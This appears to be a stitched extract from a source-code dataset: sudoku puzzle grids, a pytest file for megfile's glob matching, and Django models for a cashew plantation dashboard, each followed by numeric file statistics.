        [0,7,0,0,0,0,0,9,0]
    ], [
        [2,0,0,1,7,0,6,0,3],
        [0,5,0,0,0,0,1,0,0],
        [0,0,0,0,0,6,0,7,9],
        [0,0,0,0,4,0,7,0,0],
        [0,0,0,8,0,1,0,0,0],
        [0,0,9,0,5,0,0,0,0],
        [3,1,0,4,0,0,0,0,0],
        [0,0,5,0,0,0,0,6,0],
        [9,0,6,0,3,7,0,0,2]
    ], [
        [0,0,0,0,0,0,0,8,0],
        [8,0,0,7,0,1,0,4,0],
        [0,4,0,0,2,0,0,3,0],
        [3,7,4,0,0,0,9,0,0],
        [0,0,0,0,3,0,0,0,0],
        [0,0,5,0,0,0,3,2,1],
        [0,1,0,0,6,0,0,5,0],
        [0,5,0,8,0,2,0,0,6],
        [0,8,0,0,0,0,0,0,0]
    ], [
        [0,0,0,0,0,0,0,8,5],
        [0,0,0,2,1,0,0,0,9],
        [9,6,0,0,8,0,1,0,0],
        [5,0,0,8,0,0,0,1,6],
        [0,0,0,0,0,0,0,0,0],
        [8,9,0,0,0,6,0,0,7],
        [0,0,9,0,7,0,0,5,2],
        [3,0,0,0,5,4,0,0,0],
        [4,8,0,0,0,0,0,0,0]
    ], [
        [6,0,8,0,7,0,5,0,2],
        [0,5,0,6,0,8,0,7,0],
        [0,0,2,0,0,0,3,0,0],
        [5,0,0,0,9,0,0,0,6],
        [0,4,0,3,0,2,0,5,0],
        [8,0,0,0,5,0,0,0,3],
        [0,0,5,0,0,0,2,0,0],
        [0,1,0,7,0,4,0,9,0],
        [4,0,9,0,6,0,7,0,1]
    ], [
        [0,5,0,0,1,0,0,4,0],
        [1,0,7,0,0,0,6,0,2],
        [0,0,0,9,0,5,0,0,0],
        [2,0,8,0,3,0,5,0,1],
        [0,4,0,0,7,0,0,2,0],
        [9,0,1,0,8,0,4,0,6],
        [0,0,0,4,0,1,0,0,0],
        [3,0,4,0,0,0,7,0,9],
        [0,2,0,0,6,0,0,1,0]
    ], [
        [0,5,3,0,0,0,7,9,0],
        [0,0,9,7,5,3,4,0,0],
        [1,0,0,0,0,0,0,0,2],
        [0,9,0,0,8,0,0,1,0],
        [0,0,0,9,0,7,0,0,0],
        [0,8,0,0,3,0,0,7,0],
        [5,0,0,0,0,0,0,0,3],
        [0,0,7,6,4,1,2,0,0],
        [0,6,1,0,0,0,9,4,0]
    ], [
        [0,0,6,0,8,0,3,0,0],
        [0,4,9,0,7,0,2,5,0],
        [0,0,0,4,0,5,0,0,0],
        [6,0,0,3,1,7,0,0,4],
        [0,0,7,0,0,0,8,0,0],
        [1,0,0,8,2,6,0,0,9],
        [0,0,0,7,0,2,0,0,0],
        [0,7,5,0,4,0,1,9,0],
        [0,0,3,0,9,0,6,0,0]
    ], [
        [0,0,5,0,8,0,7,0,0],
        [7,0,0,2,0,4,0,0,5],
        [3,2,0,0,0,0,0,8,4],
        [0,6,0,1,0,5,0,4,0],
        [0,0,8,0,0,0,5,0,0],
        [0,7,0,8,0,3,0,1,0],
        [4,5,0,0,0,0,0,9,1],
        [6,0,0,5,0,8,0,0,7],
        [0,0,3,0,1,0,6,0,0]
    ], [
        [0,0,0,9,0,0,8,0,0],
        [1,2,8,0,0,6,4,0,0],
        [0,7,0,8,0,0,0,6,0],
        [8,0,0,4,3,0,0,0,7],
        [5,0,0,0,0,0,0,0,9],
        [6,0,0,0,7,9,0,0,8],
        [0,9,0,0,0,4,0,1,0],
        [0,0,3,6,0,0,2,8,4],
        [0,0,1,0,0,7,0,0,0]
    ], [
        [0,0,0,0,8,0,0,0,0],
        [2,7,0,0,0,0,0,5,4],
        [0,9,5,0,0,0,8,1,0],
        [0,0,9,8,0,6,4,0,0],
        [0,2,0,4,0,3,0,6,0],
        [0,0,6,9,0,5,1,0,0],
        [0,1,7,0,0,0,6,2,0],
        [4,6,0,0,0,0,0,3,8],
        [0,0,0,0,9,0,0,0,0]
    ], [
        [0,0,0,6,0,2,0,0,0],
        [4,0,0,0,5,0,0,0,1],
        [0,8,5,0,1,0,6,2,0],
        [0,3,8,2,0,6,7,1,0],
        [0,0,0,0,0,0,0,0,0],
        [0,1,9,4,0,7,3,5,0],
        [0,2,6,0,4,0,5,3,0],
        [9,0,0,0,2,0,0,0,7],
        [0,0,0,8,0,9,0,0,0]
    ], [
        [0,0,0,9,0,0,0,0,2],
        [0,5,0,1,2,3,4,0,0],
        [0,3,0,0,0,0,1,6,0],
        [9,0,8,0,0,0,0,0,0],
        [0,7,0,0,0,0,0,9,0],
        [0,0,0,0,0,0,2,0,5],
        [0,9,1,0,0,0,0,5,0],
        [0,0,7,4,3,9,0,2,0],
        [4,0,0,0,0,7,0,0,0]
    ], [
        [3,8,0,0,0,0,0,0,0],
        [0,0,0,4,0,0,7,8,5],
        [0,0,9,0,2,0,3,0,0],
        [0,6,0,0,9,0,0,0,0],
        [8,0,0,3,0,2,0,0,9],
        [0,0,0,0,4,0,0,7,0],
        [0,0,1,0,7,0,5,0,0],
        [4,9,5,0,0,6,0,0,0],
        [0,0,0,0,0,0,0,9,2]
    ], [
        [0,0,0,1,5,8,0,0,0],
        [0,0,2,0,6,0,8,0,0],
        [0,3,0,0,0,0,0,4,0],
        [0,2,7,0,3,0,5,1,0],
        [0,0,0,0,0,0,0,0,0],
        [0,4,6,0,8,0,7,9,0],
        [0,5,0,0,0,0,0,8,0],
        [0,0,4,0,7,0,1,0,0],
        [0,0,0,3,2,5,0,0,0]
    ], [
        [0,1,0,5,0,0,2,0,0],
        [9,0,0,0,0,1,0,0,0],
        [0,0,2,0,0,8,0,3,0],
        [5,0,0,0,3,0,0,0,7],
        [0,0,8,0,0,0,5,0,0],
        [6,0,0,0,8,0,0,0,4],
        [0,4,0,1,0,0,7,0,0],
        [0,0,0,7,0,0,0,0,6],
        [0,0,3,0,0,4,0,5,0]
    ], [
        [0,8,0,0,0,0,0,4,0],
        [0,0,0,4,6,9,0,0,0],
        [4,0,0,0,0,0,0,0,7],
        [0,0,5,9,0,4,6,0,0],
        [0,7,0,6,0,8,0,3,0],
        [0,0,8,5,0,2,1,0,0],
        [9,0,0,0,0,0,0,0,5],
        [0,0,0,7,8,1,0,0,0],
        [0,6,0,0,0,0,0,1,0]
    ], [
        [9,0,4,2,0,0,0,0,7],
        [0,1,0,0,0,0,0,0,0],
        [0,0,0,7,0,6,5,0,0],
        [0,0,0,8,0,0,0,9,0],
        [0,2,0,9,0,4,0,6,0],
        [0,4,0,0,0,2,0,0,0],
        [0,0,1,6,0,7,0,0,0],
        [0,0,0,0,0,0,0,3,0],
        [3,0,0,0,0,5,7,0,2]
    ], [
        [0,0,0,7,0,0,8,0,0],
        [0,0,6,0,0,0,0,3,1],
        [0,4,0,0,0,2,0,0,0],
        [0,2,4,0,7,0,0,0,0],
        [0,1,0,0,3,0,0,8,0],
        [0,0,0,0,6,0,2,9,0],
        [0,0,0,8,0,0,0,7,0],
        [8,6,0,0,0,0,5,0,0],
        [0,0,2,0,0,6,0,0,0]
    ], [
        [0,0,1,0,0,7,0,9,0],
        [5,9,0,0,8,0,0,0,1],
        [0,3,0,0,0,0,0,8,0],
        [0,0,0,0,0,5,8,0,0],
        [0,5,0,0,6,0,0,2,0],
        [0,0,4,1,0,0,0,0,0],
        [0,8,0,0,0,0,0,3,0],
        [1,0,0,0,2,0,0,7,9],
        [0,2,0,7,0,0,4,0,0]
    ], [
        [0,0,0,0,0,3,0,1,7],
        [0,1,5,0,0,9,0,0,8],
        [0,6,0,0,0,0,0,0,0],
        [1,0,0,0,0,7,0,0,0],
        [0,0,9,0,0,0,2,0,0],
        [0,0,0,5,0,0,0,0,4],
        [0,0,0,0,0,0,0,2,0],
        [5,0,0,6,0,0,3,4,0],
        [3,4,0,2,0,0,0,0,0]
    ], [
        [3,0,0,2,0,0,0,0,0],
        [0,0,0,1,0,7,0,0,0],
        [7,0,6,0,3,0,5,0,0],
        [0,7,0,0,0,9,0,8,0],
        [9,0,0,0,2,0,0,0,4],
        [0,1,0,8,0,0,0,5,0],
        [0,0,9,0,4,0,3,0,1],
        [0,0,0,7,0,2,0,0,0],
        [0,0,0,0,0,8,0,0,6]
    ]]
| 21.125249
| 22
| 0.38274
| 4,054
| 10,626
| 1.00296
| 0.003453
| 0.784555
| 0.723807
| 0.588293
| 0.958436
| 0.902853
| 0.799311
| 0.621003
| 0.512051
| 0.403591
| 0
| 0.420954
| 0.094579
| 10,626
| 502
| 23
| 21.167331
| 0.001663
| 0
| 0
| 0.197211
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.001992
| true
| 0
| 0
| 0.001992
| 0.003984
| 0
| 0
| 0
| 1
| null | 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
496cf9d45a7840abeb031e02f2b254b24081f7f6
| 4,652
|
py
|
Python
|
tests/lib/test_fnmatch.py
|
bbtfr/megfile
|
7a0d4bd8fa6f52512e99dfd490bf404fb4f5ede0
|
[
"Apache-2.0",
"MIT"
] | 69
|
2021-08-28T15:03:26.000Z
|
2022-03-04T23:43:22.000Z
|
tests/lib/test_fnmatch.py
|
bbtfr/megfile
|
7a0d4bd8fa6f52512e99dfd490bf404fb4f5ede0
|
[
"Apache-2.0",
"MIT"
] | 75
|
2021-08-30T02:36:46.000Z
|
2022-03-29T07:59:11.000Z
|
tests/lib/test_fnmatch.py
|
bbtfr/megfile
|
7a0d4bd8fa6f52512e99dfd490bf404fb4f5ede0
|
[
"Apache-2.0",
"MIT"
] | 9
|
2021-08-30T10:46:52.000Z
|
2022-01-08T08:26:58.000Z
|
import sys
from megfile.lib import fnmatch
def test_translate():
    """translate() converts a glob pattern into regex source text.

    Every expectation is wrapped in fnmatch._compat, which presumably
    adapts the raw regex for the running Python version -- confirm
    against megfile.lib.fnmatch.
    """
    # wildcard: '?' -> any one char, '*' -> any run that cannot cross
    # '/', '**' -> any run including '/'; a leading '**/' is optional.
    assert fnmatch.translate('?') == fnmatch._compat(r'.')
    assert fnmatch.translate('*') == fnmatch._compat(r'[^/]*')
    assert fnmatch.translate('**') == fnmatch._compat(r'.*')
    assert fnmatch.translate('**/a') == fnmatch._compat(r'(.*/)?a')
    # NOTE(review): the two branches differ only in whether '/' is
    # backslash-escaped -- presumably because re.escape stopped escaping
    # '/' in Python 3.7; confirm.
    if sys.version_info > (3, 7):
        assert fnmatch.translate('b**/a') == fnmatch._compat(r'b.*/a')
        assert fnmatch.translate('b/**/a') == fnmatch._compat(r'b/(.*/)?a')
        assert fnmatch.translate('c/b**/a') == fnmatch._compat(r'c/b.*/a')
    else:
        assert fnmatch.translate('b**/a') == fnmatch._compat(r'b.*\/a')
        assert fnmatch.translate('b/**/a') == fnmatch._compat(r'b\/(.*/)?a')
        assert fnmatch.translate('c/b**/a') == fnmatch._compat(r'c\/b.*\/a')
    # brackets: well-formed classes pass through, '!' negation becomes
    # '^', a leading literal '^' is escaped, and empty or unterminated
    # brackets are escaped so they match literally.
    assert fnmatch.translate('[abc]') == fnmatch._compat(r'[abc]')
    assert fnmatch.translate('[!abc]') == fnmatch._compat(r'[^abc]')
    assert fnmatch.translate('[^abc]') == fnmatch._compat(r'[\^abc]')
    assert fnmatch.translate('[abc^]') == fnmatch._compat(r'[abc^]')
    assert fnmatch.translate('[abc?]') == fnmatch._compat(r'[abc?]')
    assert fnmatch.translate('[a-z]') == fnmatch._compat(r'[a-z]')
    assert fnmatch.translate('[]') == fnmatch._compat(r'\[\]')
    if sys.version_info > (3, 7):
        assert fnmatch.translate('[!]') == fnmatch._compat(r'\[!\]')
    else:
        assert fnmatch.translate('[!]') == fnmatch._compat(r'\[\!\]')
    assert fnmatch.translate('[') == fnmatch._compat(r'\[')
    # curly braces: '{x,y}' becomes the regex alternation '(x|y)';
    # empty or unterminated braces are escaped to match literally.
    assert fnmatch.translate('{a,b}') == fnmatch._compat(r'(a|b)')
    assert fnmatch.translate('{a, b}') == fnmatch._compat(r'(a|\ b)')
    assert fnmatch.translate('{}') == fnmatch._compat(r'\{\}')
    assert fnmatch.translate('{,}') == fnmatch._compat(r'(|)')
    assert fnmatch.translate('{') == fnmatch._compat(r'\{')
    # weirdos: regex metacharacters outside glob syntax are escaped;
    # glob tokens inside braces are treated as literals; nested braces
    # are unsupported and yield a partially escaped alternation.
    assert fnmatch.translate('(a|b)') == fnmatch._compat(r'\(a\|b\)')
    assert fnmatch.translate('{*,d}') == fnmatch._compat(r'(\*|d)')
    assert fnmatch.translate('{**,d}') == fnmatch._compat(r'(\*\*|d)')
    assert fnmatch.translate('{[abc],d}') == fnmatch._compat(r'(\[abc\]|d)')
    if sys.version_info > (3, 7):
        assert fnmatch.translate('{{a,b},d}') == fnmatch._compat(r'(\{a|b),d\}')
    else:
        assert fnmatch.translate('{{a,b},d}') == fnmatch._compat(
            r'(\{a|b)\,d\}')
def test_filter():
    """filter() keeps the entries of file_list matching a glob pattern.

    The expected results keep the relative order of file_list.
    """
    # A mix of plain names, one nested path ('c/d'), and names made of
    # glob metacharacters, so patterns are also tested against names
    # that *look like* patterns.
    file_list = [
        'a', 'b', 'c/d', 'd', '*', '**', '[abc]', '(a|b)', '{a', 'b}', '{a,d}',
        '[', ']', '[]', '[!]', '{', '}', '{}', '{,}', '^', '!', '?', ','
    ]
    # wildcard: '?' matches only single-character names; '*' does not
    # cross '/', so 'c/d' is excluded; '**' matches everything.
    assert fnmatch.filter(file_list, '?') == [
        'a', 'b', 'd', '*', '[', ']', '{', '}', '^', '!', '?', ','
    ]
    assert fnmatch.filter(file_list, '*') == [
        'a', 'b', 'd', '*', '**', '[abc]', '(a|b)', '{a', 'b}', '{a,d}', '[',
        ']', '[]', '[!]', '{', '}', '{}', '{,}', '^', '!', '?', ','
    ]
    assert fnmatch.filter(file_list, '**') == [
        'a', 'b', 'c/d', 'd', '*', '**', '[abc]', '(a|b)', '{a', 'b}', '{a,d}',
        '[', ']', '[]', '[!]', '{', '}', '{}', '{,}', '^', '!', '?', ','
    ]
    assert fnmatch.filter(file_list, '**/d') == ['c/d', 'd']
    # brackets: character classes; malformed brackets match themselves.
    assert fnmatch.filter(file_list, '[abc]') == ['a', 'b']
    assert fnmatch.filter(file_list, '[!abc]') == [
        'd', '*', '[', ']', '{', '}', '^', '!', '?', ','
    ]
    assert fnmatch.filter(file_list, '[^abc]') == ['a', 'b', '^']
    assert fnmatch.filter(file_list, '[abc^]') == ['a', 'b', '^']
    assert fnmatch.filter(file_list, '[abc?]') == ['a', 'b', '?']
    assert fnmatch.filter(file_list, '[a-z]') == ['a', 'b', 'd']
    assert fnmatch.filter(file_list, '[]') == ['[]']
    assert fnmatch.filter(file_list, '[!]') == ['[!]']
    assert fnmatch.filter(file_list, '[') == ['[']
    # curly braces: alternation; malformed braces match themselves.
    assert fnmatch.filter(file_list, '{a,b}') == ['a', 'b']
    assert fnmatch.filter(file_list, '{a, b}') == ['a']
    assert fnmatch.filter(file_list, '{}') == ['{}']
    assert fnmatch.filter(file_list, '{,}') == []
    assert fnmatch.filter(file_list, '{') == ['{']
    # weirdos: glob tokens inside braces are literal, so '{*,d}' matches
    # the literal name '*' (plus 'd'), not everything.
    assert fnmatch.filter(file_list, '(a|b)') == ['(a|b)']
    assert fnmatch.filter(file_list, '{*,d}') == ['d', '*']
    assert fnmatch.filter(file_list, '{**,d}') == ['d', '**']
    assert fnmatch.filter(file_list, '{[abc],d}') == ['d', '[abc]']
    assert fnmatch.filter(file_list, '{{a,b},d}') == ['{a,d}']
def test_fnmatch():
    """Brace alternation matches its alternatives, case-sensitively."""
    pattern = '{a,b}'
    for name in ('a', 'b'):
        assert fnmatch.fnmatch(name, pattern)
    # Upper-case 'A' must not match either variant.
    assert not fnmatch.fnmatch('A', pattern)
    assert not fnmatch.fnmatchcase('A', pattern)
| 43.476636
| 80
| 0.499785
| 536
| 4,652
| 4.223881
| 0.063433
| 0.321555
| 0.301237
| 0.233657
| 0.887809
| 0.878534
| 0.836131
| 0.833481
| 0.791078
| 0.757509
| 0
| 0.001582
| 0.184652
| 4,652
| 106
| 81
| 43.886792
| 0.595307
| 0.016552
| 0
| 0.119048
| 0
| 0
| 0.146299
| 0
| 0
| 0
| 0
| 0
| 0.690476
| 1
| 0.035714
| false
| 0
| 0.02381
| 0
| 0.059524
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
49871bf683f2d7490bf499e5d671809657ab3a0b
| 15,439
|
py
|
Python
|
authentication/models.py
|
TechnoServe/Caju-Dashboard-v1
|
ee5cde55d5700abd6223bb464fec4efa708dfdfc
|
[
"MIT"
] | null | null | null |
authentication/models.py
|
TechnoServe/Caju-Dashboard-v1
|
ee5cde55d5700abd6223bb464fec4efa708dfdfc
|
[
"MIT"
] | null | null | null |
authentication/models.py
|
TechnoServe/Caju-Dashboard-v1
|
ee5cde55d5700abd6223bb464fec4efa708dfdfc
|
[
"MIT"
] | null | null | null |
# -*- encoding: utf-8 -*-
"""
Copyright (c) 2020 - Technoserve
"""
from django.db import models
from django.utils.translation import gettext_lazy as _
from django.core.validators import RegexValidator
from django.contrib.auth.models import User
# Create your models here.
class RemOrganization(models.Model):
    """Organization record with contact details and an active/inactive status."""

    # Choices for the ``status`` field. (The original declared an inner
    # ``class Status`` that was immediately shadowed by this list; the
    # dead class has been removed.)
    ACTIVE = 1
    INACTIVE = 0
    Status = [
        (ACTIVE, 'Active'),
        (INACTIVE, 'Inactive'),
    ]

    organization_name = models.CharField(max_length=200, unique=True)
    description = models.CharField(max_length=200)
    # Validator accepts an optional '+' and 9-15 digits.
    phone_regex = RegexValidator(regex=r'^\+?1?\d{9,15}$', message="Phone number must be entered in the format: '+999999999'. Up to 15 digits allowed.")
    phone = models.CharField(validators=[phone_regex], max_length=17, blank=True)  # validators should be a list
    e_mail = models.EmailField(max_length=254)
    website = models.URLField(max_length=254, null=False)
    address = models.CharField(max_length=200)
    country = models.CharField(max_length=200)
    city = models.CharField(max_length=200)
    status = models.IntegerField(choices=Status, default=ACTIVE)
    # Audit columns; user ids are stored as raw integers, not FKs.
    created_by = models.BigIntegerField(null=True)
    created_date = models.DateTimeField(blank=True, null=True)
    updated_by = models.BigIntegerField(null=True)
    updated_date = models.DateTimeField(blank=True, null=True)

    def __str__(self):
        return self.organization_name
class RemRole(models.Model):
    """Role assignable to users, with an active/inactive status."""

    # Choices for the ``status`` field. (The original declared an inner
    # ``class Status`` that was immediately shadowed by this list; the
    # dead class has been removed.)
    ACTIVE = 1
    INACTIVE = 0
    Status = [
        (ACTIVE, 'Active'),
        (INACTIVE, 'Inactive'),
    ]

    role_name = models.CharField(max_length=200)
    status = models.IntegerField(choices=Status, default=ACTIVE)
    # Audit columns; user ids are stored as raw integers, not FKs.
    created_by = models.BigIntegerField(null=True)
    created_date = models.DateTimeField(blank=True, null=True)
    updated_by = models.BigIntegerField(null=True)
    updated_date = models.DateTimeField(blank=True, null=True)

    def __str__(self):
        return self.role_name
class RemUser(models.Model):
    """User profile linked to an organization and a role."""

    # Status choices (currently not referenced by any field here; the
    # ``status`` field is commented out in the original source). The
    # dead inner ``class Status`` that was shadowed by this list has
    # been removed.
    ACTIVE = 1
    INACTIVE = 0
    Status = [
        (ACTIVE, 'Active'),
        (INACTIVE, 'Inactive'),
    ]

    # Gender choices (the ``gender`` field itself is commented out in
    # the original source). The dead inner ``class GenderChoices`` has
    # been removed.
    MALE = 'male'
    FEMALE = 'female'
    OTHERS = 'others'
    GenderChoices = [
        (MALE, 'Male'),
        (FEMALE, 'Female'),
        # Bug fix: this entry previously stored FEMALE for the
        # 'Others' label, duplicating the 'female' value and leaving
        # OTHERS outside the choices.
        (OTHERS, 'Others'),
    ]

    first_name = models.CharField(max_length=200)
    last_name = models.CharField(max_length=200)
    username = models.CharField(max_length=200, unique=True)
    # Validator accepts an optional '+' and 9-15 digits.
    phone_regex = RegexValidator(regex=r'^\+?1?\d{9,15}$', message="Phone number must be entered in the format: '+999999999'. Up to 15 digits allowed.")
    phone = models.CharField(validators=[phone_regex], max_length=17, blank=True)  # validators should be a list
    email = models.EmailField(max_length=254)
    organization = models.ForeignKey(RemOrganization, on_delete=models.CASCADE, null=True)
    role = models.ForeignKey(RemRole, on_delete=models.CASCADE, null=True)
    # Audit columns; user ids are stored as raw integers, not FKs.
    created_by = models.BigIntegerField(blank=True, null=True)
    created_date = models.DateTimeField(blank=True, null=True)
    updated_by = models.BigIntegerField(blank=True, null=True)
    updated_date = models.DateTimeField(blank=True, null=True)

    def __str__(self):
        return self.username
class Nursery(models.Model):
    """A plant nursery with its owner, location and plant count."""

    # Choices for the ``status`` field. The dead inner ``class Status``
    # that was shadowed by this list has been removed.
    ACTIVE = 1
    INACTIVE = 0
    Status = [
        (ACTIVE, 'Active'),
        (INACTIVE, 'Inactive'),
    ]

    # Gender choices (no gender field is active on this model; kept for
    # parity with the other models). The dead inner
    # ``class GenderChoices`` has been removed.
    MALE = 'male'
    FEMALE = 'female'
    OTHERS = 'others'
    GenderChoices = [
        (MALE, 'Male'),
        (FEMALE, 'Female'),
        # Bug fix: this entry previously stored FEMALE for the
        # 'Others' label.
        (OTHERS, 'Others'),
    ]

    nursery_name = models.CharField(max_length=200, unique=True)
    owner_first_name = models.CharField(max_length=200)
    owner_last_name = models.CharField(max_length=200)
    nursery_address = models.CharField(max_length=200)
    country = models.CharField(max_length=200)
    commune = models.CharField(max_length=200)
    current_area = models.FloatField(null=True)
    # GPS coordinates of the nursery.
    latitude = models.FloatField(null=True, blank=False)
    longitude = models.FloatField(null=True)
    altitude = models.FloatField(null=True)
    partner = models.CharField(max_length=200)
    status = models.IntegerField(choices=Status, default=ACTIVE)
    number_of_plants = models.IntegerField(null=True)

    def __str__(self):
        return self.nursery_name
class NurseryPlantsHistory(models.Model):
    """Per-year/season plant counts recorded for a nursery."""

    nursery_id = models.ForeignKey(Nursery, on_delete=models.CASCADE, null=True)
    year = models.IntegerField()
    season = models.IntegerField()
    total_plants = models.BigIntegerField()
    total_grafted = models.BigIntegerField()
    total_graft_holders = models.BigIntegerField()
    polyclonal = models.CharField(max_length=300)
    comment = models.CharField(max_length=300)

    def __str__(self):
        # Bug fix: __str__ must return a str; total_plants is an
        # integer field value, so wrap it in str().
        return str(self.total_plants)
class MotherTree(models.Model):
    """A mother tree with its owner, location and certification data."""

    # Choices for the ``status`` field. The dead inner ``class Status``
    # that was shadowed by this list has been removed.
    ACTIVE = 1
    INACTIVE = 0
    Status = [
        (ACTIVE, 'Active'),
        (INACTIVE, 'Inactive'),
    ]

    # Gender choices used by ``owner_gender``. The dead inner
    # ``class GenderChoices`` has been removed.
    MALE = 'male'
    FEMALE = 'female'
    OTHERS = 'others'
    GenderChoices = [
        (MALE, 'Male'),
        (FEMALE, 'Female'),
        # Bug fix: this entry previously stored FEMALE for the
        # 'Others' label, which also left the field default (OTHERS)
        # outside the declared choices.
        (OTHERS, 'Others'),
    ]

    mother_tree_name = models.CharField(max_length=200, unique=True)
    owner_first_name = models.CharField(max_length=200)
    owner_last_name = models.CharField(max_length=200)
    owner_gender = models.CharField(
        max_length=6,
        choices=GenderChoices,
        default=OTHERS,
    )
    owner_date_of_birth = models.DateField(blank=True, null=True)
    # Validator accepts an optional '+' and 9-15 digits.
    phone_regex = RegexValidator(regex=r'^\+?1?\d{9,15}$', message="Phone number must be entered in the format: '+999999999'. Up to 15 digits allowed.")
    phone = models.CharField(validators=[phone_regex], max_length=17, blank=True)  # validators should be a list
    mother_tree_address = models.CharField(max_length=200)
    owner_address = models.CharField(max_length=200)
    country = models.CharField(max_length=200)
    department = models.CharField(max_length=200)
    commune = models.CharField(max_length=200)
    arrondissement = models.CharField(max_length=200)
    village = models.CharField(max_length=200)
    plantation_id = models.CharField(max_length=200)
    # GPS coordinates of the tree.
    latitude = models.FloatField(null=False, blank=False)
    longitude = models.FloatField(null=True)
    altitude = models.FloatField(null=True)
    certified = models.BooleanField(default=False)
    # NOTE(review): blank=True without null=True on an integer column
    # will fail at the database level when left blank -- confirm intent.
    certified_by = models.BigIntegerField(blank=True)
    certified_date = models.DateTimeField(blank=True, null=True)
    status = models.IntegerField(choices=Status, default=INACTIVE)
    # Audit columns; user ids are stored as raw integers, not FKs.
    created_by = models.BigIntegerField(blank=True, null=True)
    created_date = models.DateTimeField(blank=True, null=True)
    updated_by = models.BigIntegerField(blank=True, null=True)
    updated_date = models.DateTimeField(blank=True, null=True)

    def __str__(self):
        return self.mother_tree_name
class Plantation(models.Model):
    """A plantation with its owner, location and tree count."""

    # Choices for the ``status`` field. The dead inner ``class Status``
    # that was shadowed by this list has been removed.
    ACTIVE = 1
    INACTIVE = 0
    Status = [
        (ACTIVE, 'Active'),
        (INACTIVE, 'Inactive'),
    ]

    # Gender choices used by ``owner_gender``. The dead inner
    # ``class GenderChoices`` has been removed.
    MALE = 'male'
    FEMALE = 'female'
    OTHERS = 'others'
    GenderChoices = [
        (MALE, 'Male'),
        (FEMALE, 'Female'),
        # Bug fix: this entry previously stored FEMALE for the
        # 'Others' label, which also left the field default (OTHERS)
        # outside the declared choices.
        (OTHERS, 'Others'),
    ]

    plantation_name = models.CharField(max_length=200, unique=True)
    plantation_code = models.CharField(max_length=200, unique=True)
    owner_first_name = models.CharField(max_length=200)
    owner_last_name = models.CharField(max_length=200)
    owner_gender = models.CharField(
        max_length=6,
        choices=GenderChoices,
        default=OTHERS,
    )
    total_trees = models.IntegerField(blank=True, null=True)
    country = models.CharField(max_length=200)
    department = models.CharField(max_length=200)
    commune = models.CharField(max_length=200)
    arrondissement = models.CharField(max_length=200)
    village = models.CharField(max_length=200)
    current_area = models.FloatField(null=True)
    # GPS coordinates of the plantation.
    latitude = models.FloatField(null=False, blank=False)
    longitude = models.FloatField(null=True)
    altitude = models.FloatField(null=True)
    status = models.IntegerField(choices=Status, default=ACTIVE)

    def __str__(self):
        return self.plantation_name
class BeninYield(models.Model):
    """Yield survey record for a plantation in Benin."""

    # Choices for the ``status`` field. The dead inner ``class Status``
    # that was shadowed by this list has been removed.
    ACTIVE = 1
    INACTIVE = 0
    Status = [
        (ACTIVE, 'Active'),
        (INACTIVE, 'Inactive'),
    ]

    plantation_name = models.CharField(max_length=200)
    department = models.CharField(max_length=200)
    commune = models.CharField(max_length=200)
    arrondissement = models.CharField(max_length=200)
    village = models.CharField(max_length=200)
    owner_first_name = models.CharField(max_length=200)
    owner_last_name = models.CharField(max_length=200)
    # Bug fix: ``plantation_code`` was declared twice; only this later
    # declaration took effect, so the earlier duplicate was removed.
    plantation_code = models.CharField(max_length=200)
    surface_area = models.FloatField(null=True)
    total_yield_kg = models.FloatField()
    total_yield_per_ha_kg = models.FloatField()
    total_yield_per_tree_kg = models.FloatField()
    sex = models.CharField(max_length=200)
    plantation_id = models.ForeignKey(Plantation, on_delete=models.CASCADE, null=True)
    product_id = models.CharField(max_length=60)
    total_number_trees = models.FloatField()
    total_sick_trees = models.FloatField()
    total_dead_trees = models.FloatField()
    total_trees_out_of_prod = models.FloatField()
    plantation_age = models.FloatField()
    # GPS coordinates of the surveyed plantation.
    latitude = models.FloatField(null=False, blank=False)
    longitude = models.FloatField(null=True)
    altitude = models.FloatField(null=True)
    status = models.IntegerField(choices=Status, default=ACTIVE)
    year = models.IntegerField()

    def __str__(self):
        return str(self.product_id) + str(self.year)
class AlteiaData(models.Model):
    """Per-plantation cashew tree-cover value keyed by plantation code."""

    plantation_code = models.CharField(max_length=200, unique=True)
    cashew_tree_cover = models.FloatField(null=True)

    def __str__(self):
        return f"{self.plantation_code}"
class DeptSatellite(models.Model):
    """Department-level cashew tree-cover value from satellite data."""

    country = models.CharField(max_length=200)
    department = models.CharField(max_length=200, unique=True)
    cashew_tree_cover = models.FloatField(null=True)

    def __str__(self):
        return f"{self.department}"
class CommuneSatellite(models.Model):
    """Commune-level cashew tree-cover value from satellite data."""

    country = models.CharField(max_length=200)
    department = models.CharField(max_length=200)
    commune = models.CharField(max_length=200, unique=True)
    cashew_tree_cover = models.FloatField(null=True)

    def __str__(self):
        return f"{self.commune}"
class SpecialTuple(models.Model):
    """One-to-one mapping between a plantation id and an Alteia id."""

    plantation_id = models.CharField(max_length=200, unique=True)
    alteia_id = models.CharField(max_length=200, unique=True)

    def __str__(self):
        return f"{self.alteia_id}"
| 35.573733
| 154
| 0.688581
| 1,823
| 15,439
| 5.660998
| 0.095996
| 0.072384
| 0.127326
| 0.169767
| 0.868023
| 0.842539
| 0.807171
| 0.785756
| 0.753876
| 0.7375
| 0
| 0.027789
| 0.193536
| 15,439
| 434
| 155
| 35.573733
| 0.80106
| 0.228059
| 0
| 0.676976
| 0
| 0
| 0.054463
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.041237
| false
| 0
| 0.013746
| 0.041237
| 0.756014
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7736f0890813776e4a0f32517276ccef50836acf
| 104,403
|
py
|
Python
|
datasets/epa_historical_air_quality/pipelines/epa_historical_air_quality/epa_historical_air_quality_dag.py
|
